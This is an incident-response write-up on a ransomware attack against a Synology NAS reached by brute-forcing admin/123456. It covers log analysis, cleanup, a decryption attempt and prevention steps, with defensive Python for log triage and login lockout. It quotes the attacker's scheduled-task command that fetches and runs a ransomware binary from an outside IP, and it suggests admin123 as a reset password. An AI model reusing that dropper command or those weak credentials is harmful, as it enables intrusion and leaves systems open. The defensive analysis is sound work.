Preface

As a NAS (Network Attached Storage) system, Synology (Qunhui) mainly plays the role of a personal private cloud in daily life. Files can be stored on the NAS and shared through a web browser or mobile app, and a rich set of packages makes application management easy. With Synology's QuickConnect service you can reach the NAS anytime and anywhere without carrying a storage device. Because of these advantages, Synology is often regarded as the first choice for a NAS.

But this time it was hit by ransomware. Searching for information shows that security experts had already analysed this virus and issued early warnings back in 2019: once infected, the files are encrypted and a note left behind demands Bitcoin. It was preliminarily determined that the attacker entered through a weak password on the web interface, then created a scheduled task that downloaded a file from an IP address in the United States and executed it; the ransomware then encrypted the files. No lateral movement by the virus was found for the time being. This article mainly records the emergency response process after the ransomware attack on the Synology NAS.


First, the attack process

(1) Obtaining attack targets

The target address is http://x.x.x.x:5000. According to public information, the default ports of Synology DSM are 5000 and 5001, so the attacker most likely batch-scanned public IP addresses for ports 5000 and 5001 and recorded every host that was identified as a Synology system.

(2) Brute-forcing the weak password

The attacker used a tool to brute-force the default management account admin of the target site and got in with admin/123456. Moreover, the attacker rotated proxy IP addresses dynamically to make tracing the source harder.

(3) Planting ransomware

After logging in as admin, the ransomware was implanted, the data on the hard disks was encrypted (the encrypted files have the file type ENCRYPT), and a Bitcoin payment address was left behind.

Second, emergency procedures

The target Synology system runs DSM version 6.2.3-25426 on an Intel Celeron J3455 CPU. There is no publicly known vulnerability for this version, and the target was directly reachable from the internet.

(1) Change the password

Once the source of the intrusion is known, change the weak password so that the attacker cannot use it again. The password can be changed through the web interface or on the server itself.

(1) Change the password directly in the web interface

Change the password to a strong one; it is best to also enable 2-step verification to improve security.

(2) Change it on the server

1. Enable SSH (port 22) in the web UI

2. Log in over SSH to the admin account of the target Synology (admin is the default account)

3. Switch to root:

sudo su -

4. Enter the following command to change the password to admin123:

synouser --setpw admin admin123

(2) Log analysis

According to the victim company, they noticed the files were encrypted on July 29 but did not seek technical help until August 3. In the Synology Log Center it could then be seen that someone from 83.97.20.103 logged in to the admin account at 11:19 PM on July 28.

Of course, tracing this IP is not very useful, because it is overseas and has already been flagged as a proxy / scanner address.

The log query also shows that the attacker created a scheduled task at 19:00 on July 28.

The task runs the following command: change to /tmp, download the crp_linux_386 file with wget (skipping certificate checks) and save it as 386, grant it 777 permissions, then start the 386 program in the background with nohup so that it survives logout and sends no output to the terminal:

cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386; chmod 0777 ./386; nohup ./386 --syno=true </dev/null >/dev/null 2>&1 &

Looking up 98.144.56.47 on the ThreatBook (微步在线) threat intelligence platform shows it has already been identified as a ransomware distribution address, so the hope of decrypting the data is very slim.
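The two log findings above (an admin login from an address outside the company network, followed by a scheduled task that fetches and runs a binary from /tmp) can be pulled out of a Log Center export automatically. The following is an added example written for this article, not code from Synology or from the original post; the log lines, the trusted LAN range 192.168.1.0/24 and the addresses in the 203.0.113.0/24 documentation block are all constructed, and the line format is an assumption modelled loosely on the Log Center "Connection" and "Task Scheduler" entries rather than the real export format.

```python
"""Triage constructed DSM-style Log Center lines for the incident pattern on
this page: an admin login from an untrusted address and a scheduled task that
downloads, chmods and backgrounds a binary in /tmp (defender-side detection)."""
import ipaddress
import re

# Constructed: the company LAN. Admin logins from anywhere else are flagged.
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]

# Constructed sample export. The format is an assumption for this example.
SAMPLE_LOG = """\
2021-07-28 19:00:12 Info admin Task Scheduler created task [update] with command [cd /tmp && wget --no-check-certificate -O 386 http://203.0.113.5/1/crp_linux_386; chmod 0777 ./386; nohup ./386 --syno=true </dev/null >/dev/null 2>&1 &]
2021-07-28 09:02:10 Info alice User [alice] from [192.168.1.20] logged in successfully via [DSM].
2021-07-28 09:15:00 Info alice Task Scheduler created task [backup] with command [/usr/bin/rsync -a /volume1/share /volume1/backup]
2021-07-28 23:18:55 Warning admin User [admin] from [203.0.113.7] failed to log in via [DSM] due to authorization failure.
2021-07-28 23:19:41 Info admin User [admin] from [203.0.113.7] logged in successfully via [DSM].
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ \S+ User \[(?P<user>[^\]]+)\] from \[(?P<ip>[^\]]+)\] "
    r"(?P<result>logged in successfully|failed to log in)"
)
TASK_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ (?P<user>\S+) Task Scheduler created task "
    r"\[(?P<name>[^\]]+)\] with command \[(?P<cmd>.*)\]$"
)

# Traits of the dropper command seen in this incident. One hit alone is
# normal admin work; several together in one task are worth a look.
SUSPICIOUS = {
    "download": re.compile(r"\b(wget|curl)\b"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),
    "world_writable": re.compile(r"chmod\s+0?777"),
    "background": re.compile(r"\bnohup\b"),
    "tmp_dir": re.compile(r"\bcd\s+/tmp\b|/tmp/"),
    "silenced": re.compile(r">\s*/dev/null"),
}


def is_trusted(ip):
    """True when the address lies inside one of the trusted networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def score_task(cmd):
    """Names of the suspicious traits present in a scheduled-task command."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(cmd))


def triage(log_text, min_hits=3):
    """Walk the export once and collect the three findings a responder wants."""
    findings = {"untrusted_admin_logins": [], "failed_logins": {}, "suspicious_tasks": []}
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            ip = m["ip"]
            if m["result"].startswith("failed"):
                findings["failed_logins"][ip] = findings["failed_logins"].get(ip, 0) + 1
            elif m["user"] == "admin" and not is_trusted(ip):
                findings["untrusted_admin_logins"].append((m["ts"], m["user"], ip))
            continue
        m = TASK_RE.match(line)
        if m:
            hits = score_task(m["cmd"])
            if len(hits) >= min_hits:
                findings["suspicious_tasks"].append((m["ts"], m["user"], m["name"], hits))
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(key, value)
```

Against the constructed export the script reports one admin login from 203.0.113.7, one failed attempt from the same address, and flags only the "update" task (six traits matched) while leaving the rsync backup task alone. On a real Log Center export the regexes would need to be adjusted to the actual column layout.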

(3) Virus detection and elimination

First, delete the 386 file in the /tmp directory (unfortunately the original virus sample was not preserved, so it could not be analysed in detail). Then use the Antivirus Essential package provided by Synology to check whether there is still a virus on the NAS.

(1) Download Antivirus Essential

(2) Run a full scan

(3) Quarantine the virus

(4) Data decryption

This part is quite interesting. After the first day's on-site interview, the boss went to a Taobao shop for decryption. At first I thought the Taobao shop was really that good and could actually decrypt the data.

Copy an encrypted file and try to decrypt it with the downloaded decryption program. The decryption command is as follows:

.\decryptor_windows_x86.exe -s C:\test\


Third, prevention methods

1. Disable the default admin account, create an account with a different name, and assign administrator rights to it

2. Eliminate weak passwords and set strong ones; following the baseline protection requirements, use at least eight characters mixing digits, letters and special characters

3. Change the default login port, since the default ports are what mass scanners look for

4. Enable auto-block for IP addresses with multiple failed login attempts

5. Install security tools (Security Advisor), and apply patches and upgrade versions regularly

6. Enable the firewall and configure access rules

7. Use file version rollback, which easily restores files to their state before infection and effectively prevents files from becoming inaccessible after a ransomware infection

8. Control file permissions: when sharing files, set an access password and validity period, and restrict file permissions
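Items 2 and 4 of the list above are the two controls that would have stopped this particular intrusion (a guessable admin password and unlimited login attempts). The following is an added example written for this article, not Synology code or a description of how DSM implements these features: it checks a password against the stated rule (at least eight characters mixing digits, letters and special characters) and replays a constructed burst of login attempts through a simple sliding-window lockout, so that the effect of item 4 on a brute-force run can be seen directly. The thresholds, the addresses 203.0.113.7 and 192.168.1.20 and the attempt sequence are constructed.

```python
"""Added example: the password rule from item 2 and a per-address login
lockout as in item 4, replayed against a constructed brute-force burst."""
import string
from collections import defaultdict, deque

MIN_LENGTH = 8  # from item 2: at least eight characters


def password_meets_policy(pw):
    """Item 2: length >= 8 and a mix of digits, letters and special characters."""
    has_digit = any(c.isdigit() for c in pw)
    has_alpha = any(c.isalpha() for c in pw)
    has_special = any(c in string.punctuation for c in pw)
    return len(pw) >= MIN_LENGTH and has_digit and has_alpha and has_special


class LoginLockout:
    """Item 4: block an address after max_failures failures inside window_seconds.
    Timestamps are plain seconds so the replay below is deterministic."""

    def __init__(self, max_failures=5, window_seconds=300, block_seconds=3600):
        self.max_failures = max_failures
        self.window = window_seconds
        self.block_seconds = block_seconds
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.blocked_until = {}             # ip -> time the block expires

    def _prune(self, ip, now):
        q = self.failures[ip]
        while q and now - q[0] > self.window:
            q.popleft()

    def is_blocked(self, ip, now):
        until = self.blocked_until.get(ip)
        return until is not None and now < until

    def record_failure(self, ip, now):
        """Register a failed login; returns True when this failure trips the block."""
        self._prune(ip, now)
        self.failures[ip].append(now)
        if len(self.failures[ip]) >= self.max_failures:
            self.blocked_until[ip] = now + self.block_seconds
            return True
        return False


def replay(attempts, lock):
    """Feed (time, ip, password_correct) attempts through the lockout.
    Returns (allowed, rejected_by_lockout, failed_authentications)."""
    allowed = rejected = failed = 0
    for now, ip, ok in attempts:
        if lock.is_blocked(ip, now):
            rejected += 1          # never reaches the password check
            continue
        if ok:
            allowed += 1
        else:
            failed += 1
            lock.record_failure(ip, now)
    return allowed, rejected, failed


# Constructed: 20 wrong guesses, one per second, from one outside address,
# plus one correct login from the LAN while the burst is running.
ATTEMPTS = [(t, "203.0.113.7", False) for t in range(20)] + [(10, "192.168.1.20", True)]


if __name__ == "__main__":
    for pw in ("123456", "admin123", "Nas!2021-storage"):
        print(f"{pw!r}: {'ok' if password_meets_policy(pw) else 'rejected'}")
    print("allowed/rejected/failed:", replay(ATTEMPTS, LoginLockout()))
```

With the default thresholds the burst gets five password checks before the address is blocked and the remaining fifteen guesses are turned away before authentication, while the LAN user is unaffected; both passwords that appear in this article (123456 and admin123) fail the item 2 rule.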


Fourth, summary

This is the first time I have done emergency response work. I may know little about the Synology system or about ransomware, so some explanations are inevitably unclear or my understanding insufficient. If you have other ideas, feel free to leave them in the comments.